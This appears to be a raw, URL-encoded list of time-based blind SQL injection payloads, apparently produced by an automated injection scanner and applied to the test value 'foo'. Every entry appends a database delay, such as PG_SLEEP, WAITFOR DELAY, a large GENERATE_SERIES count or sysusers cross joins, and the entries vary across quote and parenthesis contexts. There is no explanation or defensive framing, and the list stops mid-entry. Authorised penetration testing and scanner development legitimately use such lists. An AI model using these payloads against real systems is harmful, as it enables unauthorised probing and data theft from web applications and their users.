foo%22%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%282660%3D2660 foo%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%283190%3D3190 foo%29%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%287242%3D7242 foo%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%27%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27CGmY%27%3D%27CGmY foo%27%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27AVLQ%27%3D%27AVLQ foo%27%29%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27uwNC%27%3D%27uwNC foo%27%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%27tQDY%27%3D%27tQDY foo%27%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27dUng%27%20LIKE%20%27dUng foo%27%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27KgQa%27%20LIKE%20%27KgQa foo%27%29%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27Lage%27%20LIKE%20%27Lage foo%27%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%27kFMh%27%20LIKE%20%27kFMh foo%22%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22DeXK%22%3D%22DeXK foo%22%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22cWrR%22%3D%22cWrR foo%22%29%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22xFtO%22%3D%22xFtO foo%22%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%22xsLD%22%3D%22xsLD foo%22%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22GvDZ%22%20LIKE%20%22GvDZ foo%22%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22fDCn%22%20LIKE%20%22fDCn foo%22%29%29%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22JlMe%22%20LIKE%20%22JlMe foo%22%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20AND%20%22VSoR%22%20LIKE%20%22VSoR foo%29%20WHERE%203008%3D3008%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%27%29%20WHERE%206081%3D6081%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%27%20WHERE%207985%3D7985%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%22%20WHERE%208688%3D8688%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%27%20%7C%7C%20%28SELECT%205877%20FROM%20DUAL%20WHERE%207338%3D7338%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202709%20WHERE%209310%3D9310%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%208200%20FROM%20DUAL%20WHERE%204018%3D4018%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20%29 foo%20%2B%20%28SELECT%202601%20WHERE%201811%3D1811%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27phtn%27%20FROM%20DUAL%20WHERE%208935%3D8935%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27grtB%27%20WHERE%206461%3D6461%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29%20%23 foo%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%27%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%22%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%288533%3D8533 foo%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%282905%3D2905 foo%29%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%284506%3D4506 foo%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%27VHsF%27%3D%27VHsF foo%27%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%27enOA%27%3D%27enOA foo%27%29%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%27eaQk%27%3D%27eaQk foo%27%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%27DSWf%27%3D%27DSWf foo%27%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%27mNNM%27%20LIKE%20%27mNNM foo%27%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%27DVpU%27%20LIKE%20%27DVpU foo%27%29%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%27ZKRo%27%20LIKE%20%27ZKRo foo%27%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%27iCDm%27%20LIKE%20%27iCDm foo%22%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%22JVzY%22%3D%22JVzY foo%22%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%22Mqtb%22%3D%22Mqtb foo%22%29%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%22CLyD%22%3D%22CLyD foo%22%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%22ccLa%22%3D%22ccLa foo%22%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%22qwjn%22%20LIKE%20%22qwjn foo%22%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%22WEph%22%20LIKE%20%22WEph foo%22%29%29%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%22ttKA%22%20LIKE%20%22ttKA foo%22%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20AND%20%22oGPH%22%20LIKE%20%22oGPH foo%29%20WHERE%209639%3D9639%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%27%29%20WHERE%204237%3D4237%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%27%20WHERE%201329%3D1329%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%22%20WHERE%207635%3D7635%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29-- foo%27%20%7C%7C%20%28SELECT%203213%20FROM%20DUAL%20WHERE%208497%3D8497%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208108%20WHERE%209909%3D9909%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202823%20FROM%20DUAL%20WHERE%207468%3D7468%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20%29 foo%20%2B%20%28SELECT%204727%20WHERE%202517%3D2517%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20%29 foo%27%20%2B%20%28SELECT%20%27bMlD%27%20FROM%20DUAL%20WHERE%204434%3D4434%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27FnUh%27%20WHERE%208853%3D8853%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%206514%3D%28SELECT%206514%20FROM%20PG_SLEEP%285%29%29--%20%23 foo%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%22%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%281009%3D1009 foo%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%289657%3D9657 foo%29%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%288523%3D8523 foo%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27aFct%27%3D%27aFct foo%27%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27DIzd%27%3D%27DIzd foo%27%29%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27wRCL%27%3D%27wRCL foo%27%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27cNEj%27%3D%27cNEj foo%27%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27lRFh%27%20LIKE%20%27lRFh foo%27%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27mRvt%27%20LIKE%20%27mRvt foo%27%29%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27DxMD%27%20LIKE%20%27DxMD foo%27%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27HbXP%27%20LIKE%20%27HbXP foo%22%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22LLni%22%3D%22LLni foo%22%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22thST%22%3D%22thST foo%22%29%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22AfhZ%22%3D%22AfhZ foo%22%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22FofE%22%3D%22FofE foo%22%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22FCZd%22%20LIKE%20%22FCZd foo%22%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22FFPS%22%20LIKE%20%22FFPS foo%22%29%29%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22DQxU%22%20LIKE%20%22DQxU foo%22%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22yQQu%22%20LIKE%20%22yQQu foo%29%20WHERE%209707%3D9707%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%29%20WHERE%202426%3D2426%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%20WHERE%205825%3D5825%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%22%20WHERE%207614%3D7614%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 foo%27%20%7C%7C%20%28SELECT%201035%20FROM%20DUAL%20WHERE%206373%3D6373%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%209991%20WHERE%205862%3D5862%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202212%20FROM%20DUAL%20WHERE%208470%3D8470%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29 foo%20%2B%20%28SELECT%201117%20WHERE%202360%3D2360%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27ZKKx%27%20FROM%20DUAL%20WHERE%207698%3D7698%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27qcJY%27%20WHERE%203106%3D3106%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209282%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%23 foo%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%281712%3D1712 foo%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%289931%3D9931 foo%29%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%282706%3D2706 foo%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%27yMmP%27%3D%27yMmP foo%27%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%27WaDJ%27%3D%27WaDJ foo%27%29%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%27WjHU%27%3D%27WjHU foo%27%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%27qrVT%27%3D%27qrVT foo%27%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%27Zjxt%27%20LIKE%20%27Zjxt foo%27%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%27dZRQ%27%20LIKE%20%27dZRQ foo%27%29%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%27Wxyg%27%20LIKE%20%27Wxyg foo%27%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%27YOkE%27%20LIKE%20%27YOkE foo%22%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%22tneO%22%3D%22tneO foo%22%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%22szNo%22%3D%22szNo foo%22%29%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%22duGY%22%3D%22duGY foo%22%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%22YhQD%22%3D%22YhQD foo%22%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%22qEWc%22%20LIKE%20%22qEWc foo%22%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%22KcOt%22%20LIKE%20%22KcOt foo%22%29%29%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%22qxuU%22%20LIKE%20%22qxuU foo%22%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%22ihoA%22%20LIKE%20%22ihoA foo%29%20WHERE%206477%3D6477%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%29%20WHERE%207216%3D7216%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20WHERE%204257%3D4257%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%22%20WHERE%207878%3D7878%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- foo%27%20%7C%7C%20%28SELECT%209707%20FROM%20DUAL%20WHERE%209030%3D9030%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203537%20WHERE%203042%3D3042%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202780%20FROM%20DUAL%20WHERE%204808%3D4808%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29 foo%20%2B%20%28SELECT%204424%20WHERE%208114%3D8114%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29 foo%27%20%2B%20%28SELECT%20%27lEFV%27%20FROM%20DUAL%20WHERE%209160%3D9160%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27ivqK%27%20WHERE%202447%3D2447%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209852%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%23 foo%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%282886%3D2886 foo%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%282114%3D2114 foo%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%281285%3D1285 foo%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%27bxZr%27%3D%27bxZr foo%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%27tDor%27%3D%27tDor foo%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%27oTEl%27%3D%27oTEl foo%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%27gywX%27%3D%27gywX foo%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%27MWFI%27%20LIKE%20%27MWFI foo%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%27UUAT%27%20LIKE%20%27UUAT foo%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%27ikUO%27%20LIKE%20%27ikUO foo%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%27DSSn%27%20LIKE%20%27DSSn foo%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%22oEVH%22%3D%22oEVH foo%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%22YOtY%22%3D%22YOtY foo%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%22qwdR%22%3D%22qwdR foo%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%22lcNl%22%3D%22lcNl foo%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%22mgIV%22%20LIKE%20%22mgIV foo%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%22VeGN%22%20LIKE%20%22VeGN foo%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%22hDQM%22%20LIKE%20%22hDQM foo%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%22dsNN%22%20LIKE%20%22dsNN foo%29%20WHERE%205490%3D5490%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%29%20WHERE%201699%3D1699%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20WHERE%201415%3D1415%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%22%20WHERE%201202%3D1202%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- foo%27%20%7C%7C%20%28SELECT%204122%20FROM%20DUAL%20WHERE%207466%3D7466%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203611%20WHERE%209816%3D9816%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%201971%20FROM%20DUAL%20WHERE%203884%3D3884%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29 foo%20%2B%20%28SELECT%206214%20WHERE%209830%3D9830%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29 foo%27%20%2B%20%28SELECT%20%27yUyQ%27%20FROM%20DUAL%20WHERE%203561%3D3561%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27fYZw%27%20WHERE%207697%3D7697%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%23 foo%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%22%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%287663%3D7663 foo%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%285861%3D5861 foo%29%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%283906%3D3906 foo%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27KGlF%27%3D%27KGlF foo%27%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27QVBa%27%3D%27QVBa 